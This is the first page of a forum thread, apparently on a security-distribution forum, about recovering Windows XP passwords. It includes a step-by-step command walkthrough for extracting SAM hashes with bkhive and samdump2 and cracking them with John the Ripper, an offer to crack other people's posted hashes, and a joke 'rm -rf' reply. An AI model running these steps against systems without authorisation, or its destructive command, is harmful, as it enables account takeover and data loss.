Page 1 of 6 123 ... LastLast
Results 1 to 10 of 53

Thread: Help with cracking windows xp password

  1. #1
    Just burned his ISO
    Join Date
    Feb 2006
    Posts
    9

    Default Help with cracking windows xp password

    I have the entire contents of the windows/system32/config/ folder on a flash drive. I watched the tutroial and it didnt help much. Can anyone help? Thanks!

  2. #2
    Just burned his ISO
    Join Date
    Jan 2006
    Posts
    2

    Default

    Hi,

    rm -rf /windows/system32/config/

    BC

  3. #3
    Just burned his ISO
    Join Date
    Feb 2006
    Posts
    5

    Default


    This is for testing purposes only on our local domain. Replace as necessary.

    For you, mount /mnt/*usb*
    cd *usb*

    run samdump2 and dump it to /*usb*

    brute it or rainbow it.

    If you copy/pasted the system32 to a flash drive it won't work. fyi

  4. #4
    Just burned his ISO
    Join Date
    Feb 2006
    Posts
    9

    Default

    What if i copied the system32\config\ folder with the auditor live cd? I didnt do it through windows. if that makes a difference.

  5. #5
    Just burned his ISO
    Join Date
    Feb 2006
    Posts
    9

    Default

    where are the rainbow tables located when i install backtrack on my hdd? Thanks

  6. #6
    Just burned his ISO
    Join Date
    Feb 2006
    Posts
    22

    Default

    i tried the winxp passwd crack for fun and got some output i dont really understand

    with john -show hashes.txt it said that one of 8 hashes has been cracked
    Administrator ??????E58...

    can someone enlighten me please?

  7. #7
    xatar
    Guest

    Default Windows password cracking.

    Hi all,

    To explain kirmet's question. the windows password has been stored in the SAM database (local windows accounts, not domain!) with the Lan Manager Hashing algorithm as well as the newer NTLM hashing algorithm.

    The LM hash is old, it was used for Window 3.1, 95, 98 etc. You do not need it anymore, in fact I would advise that you switch it off with either a registry change or through local security policies.

    The LM hash is insecure because it takes your password and immediately converts it to UPPERCASE. This removes any case sensitivity you had. It then splits your password into two 7 character passwords, padding out the second to make 7 characters. e.g.

    PaSshave58
    PASSHAVE58
    PASSHAV
    E58

    It then hashes (one way encryption) the two passwords seperately...

    PASSHAV = 7713c9168576a5ff
    e58 = 194db5b7f19c8340

    It then concatenates them...

    7713c9168576a5ff194db5b7f19c8340

    And that is stored in the SAM database along with the NTLM hash...

    8cacb1edb77fc056c50315feda39c8d6

    The NTLM hash is stronger as it hashes the password with case sensitivity and can accept up to 254 characters (I think!).

    Now that the revision is out of the way, to answer your question...

    John The Ripper has broken the second half of the LM hash - e58 and not the first. Did you do a brute force attack or a dictionary attack? The advantage of doing a dictionary attack is that it is very quick, just a couple of minutes to get through a decent sized dictionary, but the password HAS to exist in the dictionary file. The advantage of a brute force is that you will get the password eventually, but it may take a long time.

    Now, the rest.

    In Back|Track (I'll show you the syntax's with Back|Track instead of Auditor/Whax as it is the latest)

    First off, boot your Windows machine with the Back|Track CD.

    It should automatically mount the windows partition, if not...

    root@slax:/# mkdir /mnt/win
    root@slax:/# mount /dev/hda1 /mnt/win
    root@slax:/# cd /mnt/win/WINDOWS/System32/config
    root@slax:/# cp SAM /tmp
    root@slax:/# cp system /tmp

    That copies the two required files - SAM and system to the /tmp directory. Now you need to prepare the dictionary file.

    root@slax:/# cd /pentest/password/dictionaries/
    root@slax:/# gunzip -c wordlist.txt.Z > /tmp/wordlist.txt
    root@slax:/# cd /tmp

    Now you need to decrypt the SAM file...

    root@slax:/# bkhive system key

    Now extract the SAM file contents to a text file.

    root@slax:/# samdump2 SAM key > hashes.txt

    Now run John to break the passwords.

    root@slax:/# john -w=wordlist.txt hashes.txt

    By default it attacks the LM hash, but you can force it to the NTLM hash.

    root@slax:/# john -w=wordlist.txt -f=NT hashes.txt

    If the passwords appears in the dictionary file, then john will crack it quickly. If not, then you will have to carry out a brute force attack. (Rainbow tables is another very effective option, but Back|Track does not have any tables inbuilt as they are HUGE!)

    I have made a shockwave flash tutorial on local windows password cracking with Back|Track, but have nowhere to put it for people to download.

    Hope this helps you.
    xatar.

  8. #8
    Just burned his ISO
    Join Date
    Feb 2006
    Posts
    22

    Default

    *two thumbs up for that awesome explanation*

    well i did a dictionary attack first and a brute forced after that - the E58 part was broken with the dictionary attack - but i stopped the brute force after some time.

    so (sry but i cant remember exactly what the output said) when it said something like
    .
    ...testing key ASAMDDR - ASAEERR
    .

    the algorithm tries to crack the first and the second 7 char set of the passwd?

    cheerz

  9. #9
    xatar
    Guest

    Default

    Hi,

    Glad you liked my explanation. I teach pen testing for a living so I should be able to explain it!! ;-)

    That message at the end of John basically tells you that it is running through the possible combinations of the passwords.

    Do you still want to crack the password? If you post it, I'll crack it with rainbow tables. Preferably post the samdump2 output.

    You should be able to run through all the possible combinations in about 3 days for a brute force attack against a LM hash.

    later,
    xatar.

  10. #10
    Just burned his ISO
    Join Date
    Feb 2006
    Posts
    1

    Default

    Hi I tried this on my machine (dell xps gen2) and when I got to command line # samdump2 SAM key > hashes.txt it came up with

    No password for user Administrator (500)
    No password for user Guest (501)

    I carried on with the rest of the commands with the result of

    No password hashes loaded

    I was wondering why mine is not doing what it is meant to.
    Other than that thanks for the great tutorial.

Page 1 of 6 123 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •